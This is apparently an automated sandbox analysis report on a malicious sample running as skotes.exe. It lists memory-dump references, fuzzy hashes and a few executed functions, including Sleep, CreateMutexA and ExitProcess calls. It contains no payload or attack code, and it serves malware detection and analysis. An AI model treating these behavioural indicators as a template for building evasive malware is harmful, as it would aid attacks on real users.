Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 8b537ad7b4d019f4f29b464717b34cd3e18e57202bfa189172e7a86bedaead53
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 3DE08C32921228EBCF14DFD8D90499AF3EDEB49B00B65009AF901D3650C270DF00C7D4

Analysis Process: skotes.exePID: 1256, Parent PID: 1376COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	586
Total number of Limit Nodes:	4

Executed Functions

Function 009F652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,009F652A,?,?,?,?,?,009F7661), ref: 009F6566

Memory Dump Source

Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 1768b5382edcc15def7efcb9770d486636d0c67427f2661c21325699ae2ba90c
Instruction ID: c859a33e2e2f5494af5adbf3b803e96215c17cdff050d2a9a7bd3ef9dddbeb3a
Opcode Fuzzy Hash: 1768b5382edcc15def7efcb9770d486636d0c67427f2661c21325699ae2ba90c
Instruction Fuzzy Hash: C2E0EC3014124CAECE257B98DC19A6C7F6EFF91759F148814FA185A336CB25DD82CB81

Function 009C9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 04a8e90f6b2ac82f44211c21f896ef0b8cded89a21c2b69000a8045bbf8ffbad
Instruction ID: 7521158675f2ae41f4ec79a57bba36f2416eb9047c3196f1ab6a0dd78b2bba47
Opcode Fuzzy Hash: 04a8e90f6b2ac82f44211c21f896ef0b8cded89a21c2b69000a8045bbf8ffbad
Instruction Fuzzy Hash: 37314A31F402059BEF08DB78DC8DBAEB766EBD6314F20861DE058A73D5C77989818B52

Function 009C9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 828e5fe23eafec3cde5195a62c6fb480be991fa428396cf56ffab2c17a71c5bc
Instruction ID: 5b23acfb14f6387502ce4caa83575f35b0bcc558863315efaa2bf1f553c86096
Opcode Fuzzy Hash: 828e5fe23eafec3cde5195a62c6fb480be991fa428396cf56ffab2c17a71c5bc
Instruction Fuzzy Hash: 39310731B042099BEB1CDB68D88DBADB766EBC6314F248A1DE018E72D5C77989808753

Function 009CA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
